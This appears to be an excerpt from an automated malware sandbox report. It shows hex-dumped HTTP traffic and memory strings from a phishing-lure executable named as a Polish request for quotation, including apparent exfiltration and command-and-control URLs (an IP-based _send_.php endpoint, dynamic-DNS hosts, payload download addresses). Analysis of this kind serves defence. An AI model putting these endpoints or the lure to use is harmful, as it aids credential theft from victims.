31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:12:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:12:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tlakovec.si
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif)a
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif7a
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif:a
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifM
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifj
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifp
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.t35.com/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.t35.com/cmsys.gifq.net/cmsys.gifetVf
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.t35.com/cmsys.giftXf
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gif#x
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gif5.com/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gif?x
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gifEx
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gifetVf
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.gifrk
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.net/cmsys.giftXf
